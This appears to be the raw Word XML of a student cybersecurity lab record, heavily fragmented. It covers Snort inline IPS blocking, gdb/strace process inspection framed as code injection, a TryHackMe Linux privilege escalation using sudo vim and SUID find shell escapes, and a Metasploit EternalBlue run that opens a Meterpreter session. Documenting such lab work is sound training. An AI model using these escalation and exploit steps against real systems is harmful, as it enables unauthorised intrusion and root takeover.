      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="424FE2F5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6" w:name="_jrums74njcxt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="0DC2B0B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7" w:name="_i5wvgf91sl8x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0101280F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8" w:name="_hznkgajpdd38" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="246A6BF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9" w:name="_pab9zcrjlrfx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="21BBC1A3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0" w:name="_pb7g3g1bdtkh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3B005B53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1" w:name="_99asjjie8mpb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="17BC5DD4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2" w:name="_fu8e59klx59x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="3068419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3" w:name="_za2vi2831vab" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="2AA83051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4" w:name="_h76ppnusota8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Experiment 6.3 – IPS Blocking (Inline Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115268B3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 in Inline Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187434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-Q --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>daq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afpacket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eth0:eth0 -c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</w:p>
    <w:p w14:paraId="5D2C4FE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80361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**Commencing packet processing in inline mode**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C28DB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6C31BA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Generating ICMP traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76092A7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ping 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AEEBA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9941A9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**Request timeout / No reply**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD35C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893DC3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ICMP packets were blocked successfully, showing IPS functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B751A07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67460C7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5" w:name="_psf4mbxorxy0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="39B16ADD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6" w:name="_5tg74v3afw9f" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="665D7F71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7" w:name="_mdxb6zflama2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="2BEF061E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8" w:name="_wye5113g31w2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="0BCA6E3D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9" w:name="_osuol9e8a3pj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="6FF3DC9E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0" w:name="_38pngtl7ilis" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="79639E05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1" w:name="_4djl5appu40w" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="7DB21322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2" w:name="_ebw9xcs9pk1a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4F4D6925" w14:textId="77777777" w:rsidR="00835F24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33" w:name="_sumdr324k57t" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="33"/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RESULT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:Thus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 Snort IDS/IPS was successfully used to detect ICMP and TCP scan attacks and prevent them using inline mode on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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33950028" w14:textId="59A35684" w:rsidR="00F44251" w:rsidRPr="00835F24" w:rsidRDefault="00835F24" w:rsidP="00835F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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                         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022A5D35" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="49C0C3B0" w14:textId="7BCB389C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4" w:name="_gqj4lzjvo7nm" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="3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 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="03201DF8" w14:textId="63B1AA52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CODE INJECTION ON APPLICATION PROCESS USING PTRACE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="3A79AC9C" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4670E1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F65422C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4AA86D66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82CF104" w14:textId="7367B9B5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demonstrate code injection on a running Linux application process using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concepts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2F26FC06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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_geptrr4cmt7v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3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059F364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Listing running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F292F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aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFDF98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D59C4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**root       1023  0.0  0.1  18500  3200 ?        Ss   10:20   0:00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sbin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sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47E368C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ubuntu     1456  0.0  0.2  23456  4500 pts/0    S+   10:25   0:00 ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>target_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A3736C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ubuntu     1500  0.0  0.1  12000  2100 pts/1    R+   10:26   0:00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aux**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333CD7F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035113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Tracing the process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strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EE15A1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strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 1456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3649332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13BB44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**attach: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ptrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(PTRACE_ATTACH, 1456, NULL, NULL) = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A81186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read(0, "", 1024)                     = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25933D1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write(1, "Running...\n", 11)          = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9B118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nanosleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>({</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tv_sec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">=1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tv_nsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>=0}, NULL) = 0**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCBCD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1E5588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3. Attaching debugger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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2682E7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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 1456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070731C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A0C92B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**Attaching to process 1456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6AD4C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0x00007f... in sleep () from /lib/x86_64-linux-gnu/libc.so.6**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5071C9C2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855EDC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Inspecting registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390682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 registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9619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B2280A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**RAX: 0x0   RBX: 0x7ffd...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE5E7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RIP: 0x7f...   RSP: 0x7ffd...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6B906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RBP: 0x7ffd...**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528F21E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581438D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Modifying execution flow (conceptual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD46F9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$rip = $rip + 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA8AA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F36712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**(no explicit output, instruction pointer modified)**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A0A7E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C556F7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Continuing process execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A193A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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A93CD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88FC42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**Continuing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E658B1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Program resumed execution.**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68952F7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E4BDB9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337855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6" w:name="_4c5dkcppm5zo" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="749C3E3A" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="290C1FE6" w14:textId="44EF5F22" w:rsidR="00835F24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37" w:name="_srgv04x43spj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3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RESULT: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The running process was successfully traced using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-based tools such as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gdb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Registers and execution flow were inspected and modified conceptually, demonstrating code injection techniques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environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51307287" w14:textId="000B784E" w:rsidR="00F44251" w:rsidRPr="00835F24" w:rsidRDefault="00835F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AA672D1" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/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091BDF8" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="5312EA94" w14:textId="4BC36F29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8" w:name="_vu6uevoa07c4" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="3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 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="17BE09FC" w14:textId="6DE32AB6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PRIVILEGE ESCALATION IN TRYHACKME PLATFORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="6A0B1930" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2231C07E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69B25CBD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A9CBCFC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BFC8F39" w14:textId="4FDFDAC1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perform privilege escalation on a Linux system using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530F675B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9" w:name="_361017s6bf6z" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3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10FCEC6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205AC7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Connecting to target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB63F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ssh tryhackme@10.10.152.45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE3F4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D8DA59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tryhackme@target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:~$**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E173B6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C4E76D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Checking current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19321E8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32CAD83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AD5C3B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**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C3435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EFB28F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Checking user information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460373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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3339D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A3F709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uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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 gid=1001(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 groups=1001(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)**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECEDECB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145E35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Checking system information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712F796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uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4550C3A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66F9AD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**Linux ubuntu 4.4.0-21-generic**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4293FF8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2BE943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5. Checking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permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2448E85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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C05E35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8F0428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**User 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 xml:space="preserve"> may run the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2433E89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(root) NOPASSWD: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/bin/vim**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766DC1C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AF53C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6. Exploiting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privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E799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vim -c ':!/bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FCB1B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63B657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Verifying root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB177B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264A019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02AF4F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**root**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0460A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FDA87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Searching for SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B358AE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/ -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101DD59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3980BB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/bin/find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B069A7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/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275F998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/bin/python**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992680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0AE8C8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Exploiting SUID binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635297D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. -exec /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72973FA2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1988842" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F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4E47469" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F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F711CB8" w14:textId="13B01363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10. Checking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cron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jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216783D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/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3A273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0FEA3A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 * * * * root /home/user/script.sh**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D9D6A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70C7DF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Checking PATH variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A2B0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$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3961766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B07EC3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/local/bin:/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/bin:/bin**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FDC68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7B7280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12. Running enumeration tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18866FD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./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787DCE9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D6B733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**Possible SUID files found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E30B2B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Writable files detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D45023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Kernel vulnerability detected**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B734CB4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515262D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13. Confirming root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7B17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1C4F313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520CE4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**root**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76970AF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B8D231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086FB9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56EEDC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BA5CDC8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E50316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14. Capturing root flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658558B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 /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA871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40DE9F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**THM{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>root_access</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D60D7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2D03D04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0" w:name="_d179ptke1exx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="79C19CAA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1" w:name="_os0k43bcbty0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="13A41A46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2" w:name="_3rz95pgnea0g" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="1990B44B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3" w:name="_fbfuje3r1mqx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="5F6151F3" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="3391B3AA" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="77A6592C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="43B7D3B6" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7E41C827" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="3CA8749B" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="258E42A4" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="5D9F495F" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="42CE9967" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="0ADFE0BC" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="49BD3761" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7B026F15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76C7995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078113D6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DE2AFE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C828BA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37356190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5EC9294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FBFF34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1E40D5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54E148D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1B4C981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FA352C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7AC3C64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5595B1E7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BE27CAD" w14:textId="2B52C9DF" w:rsidR="00F44251" w:rsidRPr="005025F0" w:rsidRDefault="00000000">
      <w:pPr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Privilege escalation was successfully performed by exploiting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permissions, SUID binaries, and system misconfigurations, and root access was obtained.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5025F0" w14:paraId="5E544FEA" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7D4280E2" w14:textId="6ACB8B20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4" w:name="_5oxc6veg2xab" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="4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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="7B574739" w14:textId="50A2A36D" w:rsidR="005025F0" w:rsidRPr="000F4FFB" w:rsidRDefault="005025F0" w:rsidP="005025F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5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DEMONSTRATE VARIOUS EXPLOITS OF WINDOW OS USING METASPLOIT FRAMEWORK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005025F0" w14:paraId="0C68339B" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="638AA7BC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951CE6E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32694AD2" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025F0" w:rsidP="005025F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905DEFD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exploit Windows OS vulnerabilities using Metasploit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014877D7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5" w:name="_lvx7nppimn6v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4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542A241C" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6FB81811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Starting Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04803DF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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46D4DA1B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6EC0274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Metasploit v6.x loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0D1F2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2500+ exploits available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06731F70" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="0989BC18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Searching for exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0401A53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search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eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E2CB155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239BEF1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/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3030C7D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/ms17_010_psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A700FB9" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="18180D04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Selecting exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8200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46" w:name="_r735olgra3cn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>use 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/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB0A021" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="51FBDCD7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Setting target IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46540F8D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set RHOSTS 10.48.140.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E58032" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7C73CE2F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Setting local host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B9E0FB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set LHOST 10.48.133.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8B30E" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="49308E85" w14:textId="77777777" w:rsidR="005025F0" w:rsidRDefault="005025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29FA10EF" w14:textId="0A646983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6. Executing exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79685A11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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335435B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409C6FFD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Host is likely VULNERABLE to MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C81089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Connection established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D334DD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Sending exploit payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043EFC4B" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="7F61770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7. Meterpreter session obtained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592020B5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40939F9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Meterpreter session 1 opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E238B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7" w:name="_lwvv26vzpglx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="08867479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8" w:name="_nbhkc555aafl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="292F0BDE" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="0CE7092F" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="16581922" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="4CC8E4A6" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="51F89017" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="47BCAFC0" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="2CAF3A15" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="59540F98" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="08E71D81" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="256384D4" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="75EB7DDF" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="6648D171" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="1297B897" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="619138D8" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="1B3E94F5" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
    <w:p w14:paraId="4AE5305A" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F44251"/>
